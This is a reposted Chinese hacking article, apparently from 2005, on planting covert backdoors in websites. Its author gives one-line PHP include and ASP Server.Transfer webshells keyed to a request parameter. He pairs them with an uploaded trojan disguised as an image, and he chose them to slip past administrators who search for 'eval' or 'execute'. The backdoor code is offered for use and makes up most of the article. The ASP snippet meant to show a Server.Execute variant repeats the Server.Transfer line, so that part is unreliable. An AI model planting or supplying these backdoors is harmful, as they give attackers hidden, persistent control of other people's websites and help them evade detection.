首页 电脑 电脑学堂 查看内容

通过PHP站点的include漏洞想到的后门

2005-3-31 07:40 791 0

摘要: 作者:Kevin1986  来源:http://hididi.net/public/Kevin/ 以前用过PHP的后门,都被查的差不多.管理员有的时候很变态,去查一些特别的比如eval等等...
关键词: nbsp 代码 程序 Server 后门 kEvin1986 Transfer 所以 管理员 request

作者:Kevin1986  来源:http://hididi.net/public/Kevin/ 以前用过PHP的后门,都被查的差不多.管理员有的时候很变态,去查一些特别的比如eval等等,我上一次心爱的小马就这么挂掉了.555555.所以我就想到了Phpwind的那个文件包含漏洞.然后再一想,对呵....可以当后门嘛....于是就出来了很多论坛是可以支持上传文件的功能的,所以有的时候我们上传一个包含木马的图片,再就是可以使用下面的代码来那个哪个....... 程序代码: <?@include($_GET['kEvin1986']);?>不规范的写法是 程序代码: <?@include($kEvin1986);?>比那些管理员没事情去查eval要好多了而我又想到了另外一种ASP下的方法,也是简单明了,而且可以避开execute这个词 程序代码: <%if request("kEvin1986")<>"" then Server.Transfer request("kEvin1986")%>如果要用Server.Execuet的话就 程序代码: <%if request("kEvin1986")<>"" then Server.Transfer request("kEvin1986")%>恩.现在就不怕那些什么ASP追捕了....
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系 [邮箱地址] 删除

路过

雷人

握手

鲜花

鸡蛋

最新评论

返回顶部